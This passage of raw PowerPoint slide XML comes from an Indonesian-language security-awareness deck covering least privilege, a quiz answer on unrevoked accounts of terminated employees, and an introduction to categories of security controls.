              <a:t>Principle of Least Privilege (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>PoLP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>).</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dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar-benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pekerjaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tujuannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>5. A threat actor was able to compromise the account of a user whose employment had been terminated a week earlier. They used this account to access a network share and exfiltrate important files. What account vulnerability enabled this attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Failure to disable or deprovision terminated user accounts (or orphaned accounts).</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dirty="0"/>
              <a:t>Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mantan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>disable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> offboarding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>account management vulnerability</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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1067519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Kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaminan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpikir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
